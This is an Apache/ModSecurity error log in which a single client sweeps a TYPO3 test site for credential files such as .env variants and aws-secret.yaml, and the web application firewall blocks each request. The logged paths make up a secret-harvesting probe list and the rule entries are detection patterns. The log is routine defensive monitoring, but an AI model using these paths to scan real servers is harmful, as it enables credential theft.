[Tue Aug 12 02:35:24.823544 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aJqMTL1qHv1U4ugo3Y_zWAAAAAI"]
[Tue Aug 12 02:35:24.927004 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aJqMTL1qHv1U4ugo3Y_zWwAAAAI"]
[Tue Aug 12 02:35:24.927259 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aJqMTL1qHv1U4ugo3Y_zWwAAAAI"]
[Tue Aug 12 02:35:24.927442 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/portal/.env"] [unique_id "aJqMTL1qHv1U4ugo3Y_zWwAAAAI"]
[Tue Aug 12 02:35:24.949723 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /env/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aJqMTL1qHv1U4ugo3Y_zXAAAAAI"]
[Tue Aug 12 02:35:24.949975 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aJqMTL1qHv1U4ugo3Y_zXAAAAAI"]
[Tue Aug 12 02:35:24.950159 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/env/.env"] [unique_id "aJqMTL1qHv1U4ugo3Y_zXAAAAAI"]
[Tue Aug 12 02:35:24.972690 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aJqMTL1qHv1U4ugo3Y_zXQAAAAI"]
[Tue Aug 12 02:35:24.972942 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aJqMTL1qHv1U4ugo3Y_zXQAAAAI"]
[Tue Aug 12 02:35:24.973131 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aJqMTL1qHv1U4ugo3Y_zXQAAAAI"]
[Tue Aug 12 02:35:24.995325 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aJqMTL1qHv1U4ugo3Y_zXgAAAAI"]
[Tue Aug 12 02:35:24.995555 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aJqMTL1qHv1U4ugo3Y_zXgAAAAI"]
[Tue Aug 12 02:35:24.995757 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app/.env"] [unique_id "aJqMTL1qHv1U4ugo3Y_zXgAAAAI"]
[Tue Aug 12 02:35:25.018113 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zXwAAAAI"]
[Tue Aug 12 02:35:25.018381 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zXwAAAAI"]
[Tue Aug 12 02:35:25.018561 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zXwAAAAI"]
[Tue Aug 12 02:35:25.040771 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zYAAAAAI"]
[Tue Aug 12 02:35:25.041015 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zYAAAAAI"]
[Tue Aug 12 02:35:25.041199 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zYAAAAAI"]
[Tue Aug 12 02:35:25.063406 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aJqMTb1qHv1U4ugo3Y_zYQAAAAI"]
[Tue Aug 12 02:35:25.063662 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aJqMTb1qHv1U4ugo3Y_zYQAAAAI"]
[Tue Aug 12 02:35:25.063837 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aJqMTb1qHv1U4ugo3Y_zYQAAAAI"]
[Tue Aug 12 02:35:25.086003 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aJqMTb1qHv1U4ugo3Y_zYgAAAAI"]
[Tue Aug 12 02:35:25.086247 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aJqMTb1qHv1U4ugo3Y_zYgAAAAI"]
[Tue Aug 12 02:35:25.086446 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aJqMTb1qHv1U4ugo3Y_zYgAAAAI"]
[Tue Aug 12 02:35:25.108609 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aJqMTb1qHv1U4ugo3Y_zYwAAAAI"]
[Tue Aug 12 02:35:25.108872 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aJqMTb1qHv1U4ugo3Y_zYwAAAAI"]
[Tue Aug 12 02:35:25.109056 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aJqMTb1qHv1U4ugo3Y_zYwAAAAI"]
[Tue Aug 12 02:35:25.336610 2025] [authz_core:error] [pid 1889988] [client 185.177.72.115:11042] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws-secret.yaml
[Tue Aug 12 02:35:25.359635 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /awstats/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zagAAAAI"]
[Tue Aug 12 02:35:25.359879 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zagAAAAI"]
[Tue Aug 12 02:35:25.360064 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zagAAAAI"]
[Tue Aug 12 02:35:25.382899 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /conf/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zawAAAAI"]
[Tue Aug 12 02:35:25.383269 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zawAAAAI"]
[Tue Aug 12 02:35:25.383503 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zawAAAAI"]
[Tue Aug 12 02:35:25.405892 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zbAAAAAI"]
[Tue Aug 12 02:35:25.406135 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zbAAAAAI"]
[Tue Aug 12 02:35:25.406383 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zbAAAAAI"]
[Tue Aug 12 02:35:25.429057 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zbQAAAAI"]
[Tue Aug 12 02:35:25.429341 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zbQAAAAI"]
[Tue Aug 12 02:35:25.429561 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aJqMTb1qHv1U4ugo3Y_zbQAAAAI"]
